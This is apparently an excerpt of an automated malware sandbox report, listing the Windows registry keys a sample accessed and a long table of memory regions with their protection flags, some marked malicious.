HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
There are 332 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5E1000
heap
page read and write
 malicious
3E99000
trusted library allocation
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
2758000
trusted library allocation
page read and write
46F000
heap
page read and write
521E000
stack
page read and write | page guard
4410000
trusted library allocation
page read and write
441000
heap
page read and write
56F000
heap
page read and write
5190000
heap
page read and write
267D000
trusted library allocation
page read and write
2CF2000
heap
page read and write
275000
trusted library allocation
page execute and read and write
4B9000
heap
page read and write
400000
system
page execute and read and write
2761000
trusted library allocation
page read and write
2356000
heap
page read and write
2180000
heap
page read and write
2FE000
heap
page read and write
4B7000
heap
page read and write
509E000
stack
page read and write
4F6D000
stack
page read and write
453C000
stack
page read and write
430D000
stack
page read and write
22EE000
heap
page read and write
26C000
stack
page read and write
850000
heap
page read and write
400000
system
page execute and read and write
236F000
heap
page read and write
3E0000
heap
page read and write
48C000
heap
page read and write
26D7000
trusted library allocation
page read and write
4C8000
heap
page read and write
276F000
stack
page read and write
408B000
heap
page read and write
529E000
stack
page read and write
4D1B000
heap
page read and write
43B0000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
20C0000
trusted library allocation
page read and write
4E3000
heap
page read and write
393000
stack
page read and write
4EED000
heap
page read and write
5D0000
heap
page read and write
2070000
trusted library allocation
page read and write
21A2000
heap
page read and write
1FFF000
stack
page read and write
D7E000
stack
page read and write
43B0000
trusted library allocation
page read and write
2652000
trusted library allocation
page read and write
2314000
heap
page read and write
5D5E000
stack
page read and write
2CCF000
stack
page read and write
2347000
heap
page read and write
28CE000
stack
page read and write
49C000
heap
page read and write
512000
heap
page read and write
384D000
heap
page read and write
473000
system
page execute and read and write
1D60000
trusted library allocation
page read and write
735000
heap
page read and write
38D000
stack
page read and write
21C0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
5FF000
heap
page read and write
33C9000
trusted library allocation
page read and write
5A0000
heap
page read and write
CB000
stack
page read and write
4CEE000
stack
page read and write
3B0000
heap
page read and write
4A4000
heap
page read and write
415000
heap
page read and write
320000
heap
page read and write
447000
heap
page read and write
254A000
heap
page read and write
21C000
stack
page read and write
26F7000
trusted library allocation
page read and write
3C4F000
stack
page read and write
470000
heap
page read and write
2DB4000
heap
page read and write
3A10000
heap
page read and write
3261000
trusted library allocation
page read and write
43EE000
stack
page read and write
210000
trusted library allocation
page read and write
5A7000
heap
page read and write
5040000
heap
page read and write
4AFE000
stack
page read and write
B2C000
stack
page read and write
485000
heap
page read and write
4E5E000
stack
page read and write
84A000
heap
page read and write
49C000
heap
page read and write
230000
heap
page read and write
510E000
stack
page read and write
2DC000
stack
page read and write
2B0000
heap
page read and write
3289000
trusted library allocation
page read and write
272000
trusted library allocation
page read and write
2B1B000
heap
page read and write
545000
heap
page read and write
3A7000
heap
page read and write
5C5000
heap
page read and write
2140000
heap
page execute and read and write
43F0000
trusted library allocation
page execute and read and write
22D0000
heap
page read and write
1D90000
heap
page read and write
62D1000
heap
page read and write
2675000
trusted library allocation
page read and write
49C000
heap
page read and write
240000
trusted library allocation
page read and write
464C000
stack
page read and write
21A0000
trusted library allocation
page read and write
220E000
stack
page read and write
10000000
direct allocation
page read and write
5A7000
heap
page read and write
20000
heap
page read and write
4DBC000
heap
page read and write
5DE000
heap
page read and write
18C000
stack
page read and write
55B000
heap
page read and write
4BAE000
stack
page read and write
693000
heap
page read and write
3EB0000
heap
page read and write
42BC000
stack
page read and write
42F0000
trusted library allocation
page execute and read and write
22F3000
heap
page read and write
256C000
heap
page read and write
490000
heap
page read and write
4306000
heap
page execute and read and write
3F0000
heap
page read and write
1C90000
heap
page read and write
835000
heap
page read and write
4BF0000
heap
page read and write
1E3E000
stack
page read and write
45D000
system
page execute and read and write
10001000
direct allocation
page execute and read and write
2A0000
trusted library allocation
page read and write
690000
trusted library allocation
page read and write
22C000
stack
page read and write
990000
heap
page read and write
330000
heap
page read and write
22A3000
trusted library allocation
page read and write
4AD000
heap
page read and write
A90000
heap
page read and write
2677000
trusted library allocation
page read and write
2C6E000
stack
page read and write
2B10000
heap
page read and write
25D8000
trusted library allocation
page read and write
24BA000
trusted library allocation
page read and write
235B000
heap
page read and write
9FE000
stack
page read and write
43B0000
trusted library allocation
page read and write
2500000
heap
page read and write
2DBB000
heap
page read and write
55D000
heap
page read and write
277000
trusted library allocation
page execute and read and write
710000
heap
page read and write
2337000
heap
page read and write
244000
trusted library allocation
page read and write
619000
heap
page read and write
2170000
trusted library allocation
page read and write
49A000
heap
page read and write
3ED000
stack
page read and write
42DF000
stack
page read and write
342E000
stack
page read and write
2210000
trusted library allocation
page execute and read and write
10000
heap
page read and write
2517000
trusted library allocation
page read and write
473000
heap
page read and write
31B000
heap
page read and write
450000
trusted library allocation
page execute and read and write
20A0000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
BBE000
stack
page read and write
256A000
heap
page read and write
47A0000
heap
page read and write
2553000
heap
page read and write
236E000
heap
page read and write
5CF000
heap
page read and write
3C0000
heap
page read and write
2317000
heap
page read and write
52EE000
stack
page read and write
4410000
trusted library allocation
page read and write
4C0D000
heap
page read and write
480000
heap
page read and write
1D5E000
stack
page read and write
568000
heap
page read and write
2673000
trusted library allocation
page read and write
A50000
heap
page read and write
3D40000
heap
page read and write
42B0000
trusted library allocation
page read and write
440000
trusted library allocation
page read and write
656000
heap
page read and write
479000
heap
page read and write
1C0000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
459E000
stack
page read and write
32B1000
trusted library allocation
page read and write
44DE000
stack
page read and write
256A000
heap
page read and write
24AF000
trusted library allocation
page read and write
22FB000
heap
page read and write
43B0000
trusted library allocation
page read and write
4D9C000
heap
page read and write
235E000
heap
page read and write
5DF000
heap
page read and write
481000
heap
page read and write
309000
heap
page read and write
2A00000
trusted library allocation
page read and write
22B1000
trusted library allocation
page read and write
43BD000
trusted library allocation
page read and write
48C000
heap
page read and write
21A000
trusted library allocation
page read and write
4FDD000
stack
page read and write
24A8000
trusted library allocation
page read and write
42C0000
trusted library allocation
page read and write
2A8000
trusted library allocation
page read and write
38F000
stack
page read and write
437E000
stack
page read and write
4CF000
stack
page read and write
49C000
heap
page read and write
47C000
heap
page read and write
37C000
stack
page read and write
25BA000
trusted library allocation
page read and write
5D7E000
stack
page read and write
F10000
heap
page read and write
5D64000
heap
page read and write
234E000
heap
page read and write
504D000
heap
page read and write
2B7E000
stack
page read and write
25BC000
trusted library allocation
page read and write
660000
heap
page read and write
5C4000
heap
page read and write
5DEE000
stack
page read and write
1FDC000
stack
page read and write
4F0000
heap
page read and write
1C8E000
stack
page read and write
336000
heap
page read and write
4420000
trusted library allocation
page read and write
4310000
trusted library allocation
page read and write
2401000
trusted library allocation
page read and write
58E000
stack
page read and write
29CE000
stack
page read and write
49C000
heap
page read and write
22ED000
heap
page read and write
2EE000
heap
page read and write
94E000
stack
page read and write
4A9E000
stack
page read and write
2D0000
heap
page read and write
600000
heap
page read and write
2B2E000
stack
page read and write
2B14000
heap
page read and write
459000
heap
page read and write
210E000
stack
page read and write | page guard
43B0000
trusted library allocation
page read and write
264000
heap
page read and write
25BE000
trusted library allocation
page read and write
697000
trusted library allocation
page read and write
22FF000
trusted library allocation
page read and write
18A000
stack
page read and write
2900000
trusted library allocation
page read and write
32E000
stack
page read and write
10000
heap
page read and write
4330000
trusted library allocation
page read and write
26F000
heap
page read and write
10016000
direct allocation
page execute and read and write
44EF000
stack
page read and write
27F000
stack
page read and write
3F8000
heap
page read and write
119E000
stack
page read and write
2607000
trusted library allocation
page read and write
547000
heap
page read and write
47D000
heap
page read and write
250F000
stack
page read and write
460000
trusted library allocation
page read and write
3EF0000
heap
page read and write
2010000
direct allocation
page read and write
445B000
stack
page read and write
5DC000
heap
page read and write
5D60000
heap
page read and write
43B0000
trusted library allocation
page read and write
4320000
trusted library allocation
page read and write
2790000
trusted library allocation
page read and write
2080000
trusted library allocation
page read and write
43FE000
stack
page read and write
450000
heap
page read and write
61CE000
stack
page read and write
272000
trusted library allocation
page read and write
254D000
stack
page read and write
21BC000
stack
page read and write
1C4000
trusted library allocation
page read and write
2D6F000
stack
page read and write
2366000
heap
page read and write
4340000
trusted library allocation
page read and write
9D0000
heap
page read and write
45ED000
stack
page read and write
41F000
system
page execute and read and write
CC000
stack
page read and write
4BE000
heap
page read and write
52C000
heap
page read and write
810000
heap
page read and write
5FFF000
stack
page read and write
385F000
heap
page read and write
4E84000
heap
page read and write
2D8E000
stack
page read and write
20000
heap
page read and write
4D5E000
stack
page read and write | page guard
170000
heap
page read and write
438C000
stack
page read and write
43B0000
trusted library allocation
page read and write
330000
heap
page read and write
621E000
stack
page read and write
9CF000
heap
page read and write
699000
trusted library allocation
page read and write
2501000
heap
page read and write
750000
heap
page read and write
326000
heap
page read and write
3874000
heap
page read and write
4BB000
heap
page read and write
46D000
heap
page read and write
506000
heap
page read and write
4D5F000
stack
page read and write
3E0000
heap
page read and write
27AF000
stack
page read and write
256A000
heap
page read and write
623000
heap
page read and write
43B0000
trusted library allocation
page read and write
2E60000
heap
page read and write
2F6E000
stack
page read and write
225F000
stack
page read and write
3830000
heap
page read and write
310000
heap
page read and write
5DB000
heap
page read and write
717000
heap
page read and write
1D80000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
4370000
heap
page read and write
43B0000
trusted library allocation
page read and write
2F70000
trusted library allocation
page read and write
2332000
heap
page read and write
2363000
heap
page read and write
474000
remote allocation
page execute and read and write
259C000
trusted library allocation
page read and write
31CB000
stack
page read and write
F21000
heap
page read and write
207000
stack
page read and write
10FE000
stack
page read and write
543000
heap
page read and write
2184000
heap
page read and write
501E000
stack
page read and write
2DB8000
heap
page read and write
1C7B000
stack
page read and write
2DCE000
stack
page read and write
4DB7000
heap
page read and write
46D000
heap
page read and write
5DD000
heap
page read and write
38E000
stack
page read and write
6000000
heap
page read and write
BBE000
stack
page read and write
286F000
stack
page read and write
1D98000
heap
page read and write
451000
heap
page read and write
3D7000
heap
page read and write
43B0000
trusted library allocation
page read and write
2C0000
trusted library allocation
page execute and read and write
74A000
heap
page read and write
2549000
heap
page read and write
249F000
trusted library allocation
page read and write
243000
trusted library allocation
page execute and read and write
61E000
stack
page read and write
22F0000
heap
page read and write
1F9E000
stack
page read and write
45C000
system
page execute and read and write
521F000
stack
page read and write
471000
heap
page read and write
CB0000
heap
page read and write
457B000
stack
page read and write
4D09000
heap
page read and write
10000
heap
page read and write
4BEF000
stack
page read and write
2C00000
heap
page read and write
2735000
trusted library allocation
page read and write
4ADD000
stack
page read and write
21B0000
trusted library allocation
page read and write
2557000
heap
page read and write
637000
heap
page read and write
210F000
stack
page read and write
20B0000
trusted library allocation
page read and write
2261000
trusted library allocation
page read and write
EAE000
stack
page read and write
336000
stack
page read and write
2366000
heap
page read and write
2E5F000
stack
page read and write
48C000
heap
page read and write
2220000
heap
page read and write
41BF000
stack
page read and write
533E000
stack
page read and write
C10000
heap
page read and write
4BEE000
stack
page read and write
2260000
trusted library allocation
page read and write
275000
trusted library allocation
page execute and read and write
43B0000
trusted library allocation
page read and write
540000
heap
page read and write
386F000
heap
page read and write
66F000
heap
page read and write
C7000
stack
page read and write
25A000
trusted library allocation
page read and write
616E000
stack
page read and write
189000
heap
page read and write
7EF20000
trusted library allocation
page execute and read and write
43B0000
trusted library allocation
page read and write
60F000
heap
page read and write
6531000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
2A8000
trusted library allocation
page read and write
48C000
heap
page read and write
22C000
stack
page read and write
4300000
heap
page execute and read and write
9C6000
heap
page read and write
4412000
trusted library allocation
page read and write
5C7E000
stack
page read and write
480000
heap
page read and write
45E000
heap
page read and write
104F000
stack
page read and write
1E70000
heap
page read and write
32D9000
trusted library allocation
page read and write
583000
heap
page read and write
1CD000
trusted library allocation
page execute and read and write
FEE000
stack
page read and write
2310000
heap
page read and write
C00000
heap
page read and write
1A0000
heap
page read and write
33B0000
trusted library allocation
page read and write
10000
heap
page read and write
3D0000
trusted library allocation
page read and write
2616000
trusted library allocation
page read and write
4E7E000
stack
page read and write
2DB0000
heap
page read and write
449B000
stack
page read and write
269F000
stack
page read and write
2BFE000
stack
page read and write
940000
heap
page read and write
4FE000
stack
page read and write
1C3000
trusted library allocation
page execute and read and write
560000
heap
page read and write
25B6000
trusted library allocation
page read and write
525000
heap
page read and write
407D000
stack
page read and write
95D000
heap
page read and write
232D000
heap
page read and write
2300000
heap
page read and write
2549000
heap
page read and write
270000
trusted library allocation
page read and write
33E000
heap
page read and write
2B18000
heap
page read and write
4D3000
heap
page read and write
62C0000
heap
page read and write
89000
stack
page read and write
35A9000
trusted library allocation
page read and write
2180000
trusted library allocation
page read and write
5DA000
heap
page read and write
2210000
trusted library allocation
page read and write
23C9000
heap
page read and write
10000
heap
page read and write
2F0000
trusted library allocation
page read and write
4D3000
heap
page read and write
2560000
heap
page read and write
4E80000
heap
page read and write
4F20000
heap
page read and write
4CE000
heap
page read and write
4B4E000
stack
page read and write
F28000
heap
page read and write
400000
heap
page execute and read and write
2754000
trusted library allocation
page read and write
2679000
trusted library allocation
page read and write
1C0000
heap
page read and write
480000
heap
page read and write
560000
heap
page read and write
BFF000
stack
page read and write
22EE000
heap
page read and write
4EC5000
heap
page read and write
2110000
trusted library allocation
page read and write
2B6F000
stack
page read and write
8B000
stack
page read and write
4B1E000
stack
page read and write
BCD000
stack
page read and write
2DAD000
stack
page read and write
114E000
stack
page read and write
213B000
stack
page read and write
66B000
heap
page read and write
2E0000
heap
page read and write
2303000
heap
page read and write
4D54000
heap
page read and write
456000
system
page execute and read and write
2F70000
trusted library allocation
page read and write
48C000
heap
page read and write
5BE000
stack
page read and write
4BAE000
stack
page read and write
43A0000
trusted library allocation
page read and write
6A0000
heap
page read and write
5D82000
heap
page read and write
5F8E000
stack
page read and write
239A000
trusted library allocation
page read and write
448000
heap
page read and write
10000
heap
page read and write
353E000
stack
page read and write
240000
heap
page read and write
2562000
heap
page read and write
4F10000
heap
page read and write
256D000
heap
page read and write
C6D000
stack
page read and write
459000
system
page execute and read and write
5DF000
heap
page read and write
9C0000
heap
page read and write
2F0000
heap
page read and write
3AA000
stack
page read and write
601000
heap
page read and write
5F04000
heap
page read and write
5F00000
heap
page read and write
43B0000
trusted library allocation
page read and write
2328000
heap
page read and write
248D000
trusted library allocation
page read and write
22F6000
heap
page read and write
46AD000
stack
page read and write
2000000
heap
page read and write
4D0000
heap
page read and write
24B6000
trusted library allocation
page read and write
5F22000
heap
page read and write
40B0000
heap
page read and write
60E000
heap
page read and write
377000
stack
page read and write
2270000
heap
page read and write
2C0000
trusted library allocation
page execute and read and write
45EE000
stack
page read and write
81E000
stack
page read and write
239F000
stack
page read and write
400000
system
page execute and read and write
4D1000
heap
page read and write
2317000
heap
page read and write
110000
heap
page read and write
40C000
heap
page read and write
436000
heap
page read and write
25B8000
trusted library allocation
page read and write
10000
heap
page read and write
32DF000
stack
page read and write
116E000
stack
page read and write
478000
heap
page read and write
43B0000
trusted library allocation
page read and write
3B4D000
stack
page read and write
6AA000
heap
page read and write
2F70000
trusted library allocation
page read and write
611000
heap
page read and write
1078000
heap
page read and write
4EA6000
heap
page read and write
63B000
heap
page read and write
529D000
stack
page read and write
4A8E000
stack
page read and write
49C000
heap
page read and write
39DE000
stack
page read and write
2582000
heap
page read and write
41B000
heap
page read and write
448000
heap
page read and write
50F000
heap
page read and write
527000
heap
page read and write
817000
heap
page read and write
21C0000
trusted library allocation
page read and write
629E000
stack
page read and write
47E000
heap
page read and write
1DD000
stack
page read and write
4F4000
heap
page read and write
41B000
system
page execute and read and write
4F30000
heap
page read and write
2737000
trusted library allocation
page read and write
566000
heap
page read and write
22F8000
heap
page read and write
24D000
trusted library allocation
page execute and read and write
2550000
heap
page read and write
43B0000
trusted library allocation
page read and write
6300000
trusted library section
page read and write
2D2D000
stack
page read and write
2190000
trusted library allocation
page read and write
236E000
heap
page read and write
980000
heap
page read and write
230B000
heap
page read and write
504D000
stack
page read and write
5EA0000
heap
page read and write
1CE0000
direct allocation
page read and write
2CE000
stack
page read and write
3D9000
trusted library allocation
page read and write
4C5000
heap
page read and write
1DFC000
stack
page read and write
48C000
heap
page read and write
1D90000
trusted library allocation
page read and write
2308000
heap
page read and write
69F000
heap
page read and write
32B9000
trusted library allocation
page read and write
3A0000
heap
page read and write
3A50000
heap
page read and write
236E000
heap
page read and write
268E000
trusted library allocation
page read and write
20F0000
trusted library allocation
page read and write
1CD0000
heap
page read and write
B30000
heap
page read and write
ABE000
stack
page read and write
319E000
stack
page read and write
278E000
stack
page read and write
4E0000
heap
page read and write
2D7E000
stack
page read and write
2545000
heap
page read and write
4F1E000
stack
page read and write
233A000
heap
page read and write
1D1F000
stack
page read and write
249F000
stack
page read and write
267B000
trusted library allocation
page read and write
1D70000
trusted library allocation
page execute and read and write
263C000
stack
page read and write
693000
trusted library allocation
page read and write
5CFE000
stack
page read and write
3CE000
stack
page read and write
7DE000
stack
page read and write
3F7D000
stack
page read and write
500000
heap
page read and write
2A13000
trusted library allocation
page read and write
37F0000
heap
page read and write
A6E000
stack
page read and write
4422000
trusted library allocation
page read and write
10000
heap
page read and write
520000
heap
page read and write
2D0000
trusted library allocation
page read and write
2120000
trusted library allocation
page read and write
2545000
heap
page read and write
247000
heap
page read and write
351000
heap
page read and write
233A000
heap
page read and write
255D000
trusted library allocation
page read and write
4380000
trusted library allocation
page read and write
44C000
heap
page read and write
49B000
heap
page read and write
24AA000
trusted library allocation
page read and write
2A19000
trusted library allocation
page read and write
230000
trusted library allocation
page read and write
88000
stack
page read and write
47C000
heap
page read and write
1B0000
trusted library allocation
page read and write
43B0000
trusted library allocation
page read and write
EBF000
stack
page read and write
236E000
heap
page read and write
2090000
trusted library allocation
page read and write
148000
stack
page read and write
1CB3000
heap
page read and write
34DF000
stack
page read and write
5140000
heap
page read and write
DA0000
heap
page read and write
2130000
heap
page execute and read and write
669000
heap
page read and write
2564000
heap
page read and write
220E000
stack
page read and write
22EE000
heap
page read and write
5E2E000
stack
page read and write
48C000
heap
page read and write
10000
heap
page read and write
2D0000
heap
page read and write
691000
heap
page read and write
4D5D000
heap
page read and write
2353000
heap
page read and write
2E0000
heap
page read and write
1C80000
heap
page read and write
2A6F000
stack
page read and write
4390000
trusted library allocation
page read and write
480000
heap
page read and write
2605000
trusted library allocation
page read and write
1C4D000
stack
page read and write
3C4000
heap
page read and write
49C000
heap
page read and write
47C000
heap
page read and write
5D7000
heap
page read and write
429D000
stack
page read and write
1C95000
heap
page read and write
3CE000
stack
page read and write
480000
heap
page read and write
225E000
stack
page read and write | page guard
2366000
heap
page read and write
33C000
stack
page read and write
3E7F000
stack
page read and write
5A0000
heap
page read and write
There are 675 hidden memdumps, click here to show them.